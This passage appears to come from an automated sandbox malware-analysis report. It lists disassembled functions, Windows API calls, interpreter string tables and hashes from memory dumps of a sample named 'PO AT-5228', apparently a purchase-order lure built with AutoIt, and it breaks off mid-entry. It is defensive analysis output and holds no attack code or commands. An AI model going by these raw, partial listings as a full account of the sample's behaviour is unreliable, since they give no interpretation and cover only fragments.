                                                                                        • API ID: ErrorMode$DriveType
                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                        • API String ID: 2907320926-4222207086
                                                                                        • Opcode ID: ddd1541ea69dcd4d2f0e01807b0430f7f690d11155c58b60ed2d3da9fea4f695
                                                                                        • Instruction ID: 547b1355f25153ad0e1d955f8dbb475857118f6e88cc936417ebbfcccb8e1a57
                                                                                        • Opcode Fuzzy Hash: ddd1541ea69dcd4d2f0e01807b0430f7f690d11155c58b60ed2d3da9fea4f695
                                                                                        • Instruction Fuzzy Hash: 2E51B73024C341EBC710DF14C8D1969B7E1FB5B708B1449BAF4979B691EB70DA89E742
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp
                                                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                        • API String ID: 1038674560-86951937
                                                                                        • Opcode ID: ac760b1c4f9686cc52fd7098e48199267657328222042acda0d863473f1d534f
                                                                                        • Instruction ID: 44bd64fa77fa4330d0bc6f288500ea474370f8087828e3b949c61e0279a73108
                                                                                        • Opcode Fuzzy Hash: ac760b1c4f9686cc52fd7098e48199267657328222042acda0d863473f1d534f
                                                                                        • Instruction Fuzzy Hash: 5C81F531640209ABCB10AF64CC83FBE7BE9EF24300F0444F9F949AB292FB65D945C691
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?,00BFDC00), ref: 00BC6449
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                        • API String ID: 3964851224-45149045
                                                                                        • Opcode ID: 1dccc7e5985d5bd6c376ecf91a74fc01a62ad120f0b8059a47db5a1212309e17
                                                                                        • Instruction ID: b50e6115fdb15bcbdb5d7dc3b32dae2c3e66e473508eaacb91c785e01b3d91bf
                                                                                        • Opcode Fuzzy Hash: 1dccc7e5985d5bd6c376ecf91a74fc01a62ad120f0b8059a47db5a1212309e17
                                                                                        • Instruction Fuzzy Hash: 5BC153742042458BCE05EF14C591EAE77D9EF95344F1488EDF89A9B3D2DB20ED4ACB82
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000012), ref: 00BCD5AE
                                                                                        • SetTextColor.GDI32(?,?), ref: 00BCD5B2
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00BCD5C8
                                                                                        • GetSysColor.USER32(0000000F), ref: 00BCD5D3
                                                                                        • CreateSolidBrush.GDI32(?), ref: 00BCD5D8
                                                                                        • GetSysColor.USER32(00000011), ref: 00BCD5F0
                                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00BCD5FE
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00BCD60F
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00BCD618
                                                                                        • SelectObject.GDI32(?,?), ref: 00BCD625
                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00BCD644
                                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00BCD65B
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00BCD670
                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00BCD698
                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00BCD6BF
                                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00BCD6DD
                                                                                        • DrawFocusRect.USER32(?,?), ref: 00BCD6E8
                                                                                        • GetSysColor.USER32(00000011), ref: 00BCD6F6
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00BCD6FE
                                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00BCD712
                                                                                        • SelectObject.GDI32(?,00BCD2A5), ref: 00BCD729
                                                                                        • DeleteObject.GDI32(?), ref: 00BCD734
                                                                                        • SelectObject.GDI32(?,?), ref: 00BCD73A
                                                                                        • DeleteObject.GDI32(?), ref: 00BCD73F
                                                                                        • SetTextColor.GDI32(?,?), ref: 00BCD745
                                                                                        • SetBkColor.GDI32(?,?), ref: 00BCD74F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                        • String ID:
                                                                                        • API String ID: 1996641542-0
                                                                                        • Opcode ID: abb6aa805ba3f408cf89869640994f73bfab1dd1d6b7a0194bd0219860cba227
                                                                                        • Instruction ID: e399a403c3bca4bbb702253f2789f21f57bd708a7d73dc8f4f745dc8e0598358
                                                                                        • Opcode Fuzzy Hash: abb6aa805ba3f408cf89869640994f73bfab1dd1d6b7a0194bd0219860cba227
                                                                                        • Instruction Fuzzy Hash: 64514F75900248BFDF109FA4DC88EAE7BB9FF08324F114565F915AB2A1DBB59A40CF50
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00BCB7B0
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BCB7C1
                                                                                        • CharNextW.USER32(0000014E), ref: 00BCB7F0
                                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00BCB831
                                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00BCB847
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BCB858
                                                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00BCB875
                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00BCB8C7
                                                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00BCB8DD
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00BCB90E
                                                                                        • _memset.LIBCMT ref: 00BCB933
                                                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00BCB97C
                                                                                        • _memset.LIBCMT ref: 00BCB9DB
                                                                                        • SendMessageW.USER32 ref: 00BCBA05
                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00BCBA5D
                                                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00BCBB0A
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00BCBB2C
                                                                                        • GetMenuItemInfoW.USER32(?), ref: 00BCBB76
                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00BCBBA3
                                                                                        • DrawMenuBar.USER32(?), ref: 00BCBBB2
                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00BCBBDA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                        • String ID: 0
                                                                                        • API String ID: 1073566785-4108050209
                                                                                        • Opcode ID: 5af0d1ab1b5b3c55191ad069d8c7801551eab3c77aa23fd9fb07a93f21a066cd
                                                                                        • Instruction ID: a505516cb771a5149b7b7e41fe48e934aa5fb597a200752351e39abbcac2bd32
                                                                                        • Opcode Fuzzy Hash: 5af0d1ab1b5b3c55191ad069d8c7801551eab3c77aa23fd9fb07a93f21a066cd
                                                                                        • Instruction Fuzzy Hash: 30E15E75900258AFDF209FA5CC86FEE7BB8EF05714F14819AF919AB190DB708A41DF60
                                                                                        APIs
                                                                                        • GetCursorPos.USER32(?), ref: 00BC778A
                                                                                        • GetDesktopWindow.USER32 ref: 00BC779F
                                                                                        • GetWindowRect.USER32(00000000), ref: 00BC77A6
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00BC7808
                                                                                        • DestroyWindow.USER32(?), ref: 00BC7834
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00BC785D
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BC787B
                                                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00BC78A1
                                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00BC78B6
                                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00BC78C9
                                                                                        • IsWindowVisible.USER32(?), ref: 00BC78E9
                                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00BC7904
                                                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00BC7918
                                                                                        • GetWindowRect.USER32(?,?), ref: 00BC7930
                                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00BC7956
                                                                                        • GetMonitorInfoW.USER32 ref: 00BC7970
                                                                                        • CopyRect.USER32(?,?), ref: 00BC7987
                                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00BC79F2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                        • String ID: ($0$tooltips_class32
                                                                                        • API String ID: 698492251-4156429822
                                                                                        • Opcode ID: 6702cecd7c2cdee97959c83c9bbba0c1b275f9130222b4fb85127bf77c54f8e1
                                                                                        • Instruction ID: 19542ba2d65544b9171c72cbf0d6a430a044c748471c06c8b27b8989fb83471a
                                                                                        • Opcode Fuzzy Hash: 6702cecd7c2cdee97959c83c9bbba0c1b275f9130222b4fb85127bf77c54f8e1
                                                                                        • Instruction Fuzzy Hash: 6AB15771608340AFDB04DF65C989F6ABBE5FF88310F00895DF5999B291DBB4E804CB92
                                                                                        APIs
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B7A939
                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00B7A941
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B7A96C
                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00B7A974
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00B7A999
                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00B7A9B6
                                                                                        • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00B7A9C6
                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00B7A9F9
                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00B7AA0D
                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 00B7AA2B
                                                                                        • GetStockObject.GDI32(00000011), ref: 00B7AA47
                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00B7AA52
                                                                                          • Part of subcall function 00B7B63C: GetCursorPos.USER32(000000FF), ref: 00B7B64F
                                                                                          • Part of subcall function 00B7B63C: ScreenToClient.USER32(00000000,000000FF), ref: 00B7B66C
                                                                                          • Part of subcall function 00B7B63C: GetAsyncKeyState.USER32(00000001), ref: 00B7B691
                                                                                          • Part of subcall function 00B7B63C: GetAsyncKeyState.USER32(00000002), ref: 00B7B69F
                                                                                        • SetTimer.USER32(00000000,00000000,00000028,00B7AB87), ref: 00B7AA79
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                        • String ID: AutoIt v3 GUI$mmmmmm
                                                                                        • API String ID: 1458621304-3582652670
                                                                                        • Opcode ID: ce9aa20a8dbb72bab05464607130b77d84babcb2e212a1e0987330762e5cde82
                                                                                        • Instruction ID: 387ff441f386b70ee65a97ba7308fd713d2a260b70b33c01fa6c72118714ddfe
                                                                                        • Opcode Fuzzy Hash: ce9aa20a8dbb72bab05464607130b77d84babcb2e212a1e0987330762e5cde82
                                                                                        • Instruction Fuzzy Hash: 1BB1BD71A0020A9FDB14DFA8CC85BAE7BF4FB58311F158269FA19AB2D0DB74D841CB51
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Foreground
                                                                                        • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                        • API String ID: 62970417-1919597938
                                                                                        • Opcode ID: e307b4a2daf099a1851d8b9578f4c06348989499c5555b6dd4c9cc7314348c82
                                                                                        • Instruction ID: ef5161cc032e4b61d6fb0571400a451aa0db022a0acac79ce1868abd560eb7b7
                                                                                        • Opcode Fuzzy Hash: e307b4a2daf099a1851d8b9578f4c06348989499c5555b6dd4c9cc7314348c82
                                                                                        • Instruction Fuzzy Hash: 79D1DA30508682DFCB04EF24C4819AAFBF4FF64340F0049DAF45A57661EB74E9AADB91
                                                                                        APIs
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BC3735
                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00BFDC00,00000000,?,00000000,?,?), ref: 00BC37A3
                                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00BC37EB
                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00BC3874
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00BC3B94
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00BC3BA1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$ConnectCreateRegistryValue
                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                        • API String ID: 536824911-966354055
                                                                                        • Opcode ID: ea86cb4607f037f77128885dc7bcc99eb033041738789b2f426f18f6051ed54a
                                                                                        • Instruction ID: d450ac48b7c5932b826540929a3f87b84af6f4e77039eab7ad46f2df1793ec38
                                                                                        • Opcode Fuzzy Hash: ea86cb4607f037f77128885dc7bcc99eb033041738789b2f426f18f6051ed54a
                                                                                        • Instruction Fuzzy Hash: D5025A756046019FCB14EF24C895E2AB7E5FF89720F04849DF99A9B3A2CB34ED05CB85
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00BC6C56
                                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00BC6D16
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                        • API String ID: 3974292440-719923060
                                                                                        • Opcode ID: 5a8e20a9dd97b63a8615c76cf122625143403c23f3d999ec4812c8aafd89fa62
                                                                                        • Instruction ID: 9feebcec7b664157e2d0506c750446a799200cf646d26afc53286bb0bf3f5715
                                                                                        • Opcode Fuzzy Hash: 5a8e20a9dd97b63a8615c76cf122625143403c23f3d999ec4812c8aafd89fa62
                                                                                        • Instruction Fuzzy Hash: B9A14D742142419BCB14EF24C991F6AB3E9EF55314F1489EDB86A9B2D2DB30ED0ACB41
                                                                                        APIs
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00B9CF91
                                                                                        • __swprintf.LIBCMT ref: 00B9D032
                                                                                        • _wcscmp.LIBCMT ref: 00B9D045
                                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00B9D09A
                                                                                        • _wcscmp.LIBCMT ref: 00B9D0D6
                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00B9D10D
                                                                                        • GetDlgCtrlID.USER32(?), ref: 00B9D15F
                                                                                        • GetWindowRect.USER32(?,?), ref: 00B9D195
                                                                                        • GetParent.USER32(?), ref: 00B9D1B3
                                                                                        • ScreenToClient.USER32(00000000), ref: 00B9D1BA
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00B9D234
                                                                                        • _wcscmp.LIBCMT ref: 00B9D248
                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00B9D26E
                                                                                        • _wcscmp.LIBCMT ref: 00B9D282
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                        • String ID: %s%u
                                                                                        • API String ID: 3119225716-679674701
                                                                                        • Opcode ID: 1ee3dd89ebff4c039a9302e83ec7826503c75580a02d0617586da893af49b834
                                                                                        • Instruction ID: 2de0cd197ceea563627a670b126804e2588e645578b16fe6245fd4bf5c291a53
                                                                                        • Opcode Fuzzy Hash: 1ee3dd89ebff4c039a9302e83ec7826503c75580a02d0617586da893af49b834
                                                                                        • Instruction Fuzzy Hash: 6EA1E371604302AFDB14DF65C884FAAB7E8FF44350F008A69F999D7190DB30E946CBA1
                                                                                        APIs
                                                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 00B9D8EB
                                                                                        • _wcscmp.LIBCMT ref: 00B9D8FC
                                                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 00B9D924
                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 00B9D941
                                                                                        • _wcscmp.LIBCMT ref: 00B9D95F
                                                                                        • _wcsstr.LIBCMT ref: 00B9D970
                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00B9D9A8
                                                                                        • _wcscmp.LIBCMT ref: 00B9D9B8
                                                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 00B9D9DF
                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00B9DA28
                                                                                        • _wcscmp.LIBCMT ref: 00B9DA38
                                                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 00B9DA60
                                                                                        • GetWindowRect.USER32(00000004,?), ref: 00B9DAC9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                        • String ID: @$ThumbnailClass
                                                                                        • API String ID: 1788623398-1539354611
                                                                                        • Opcode ID: 06d19f0ac3e67c196065de278942d86c70067f7a08cd05bbf48b115cad685afd
                                                                                        • Instruction ID: 949a55e9de9627a5a2b579982e3add9af7581247e3cfcdb128f3227a64183422
                                                                                        • Opcode Fuzzy Hash: 06d19f0ac3e67c196065de278942d86c70067f7a08cd05bbf48b115cad685afd
                                                                                        • Instruction Fuzzy Hash: 71819D310083459FDF05DF25C885BAA7BE8EF84314F0484BAFD899A096DB74ED56CBA1
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp
                                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
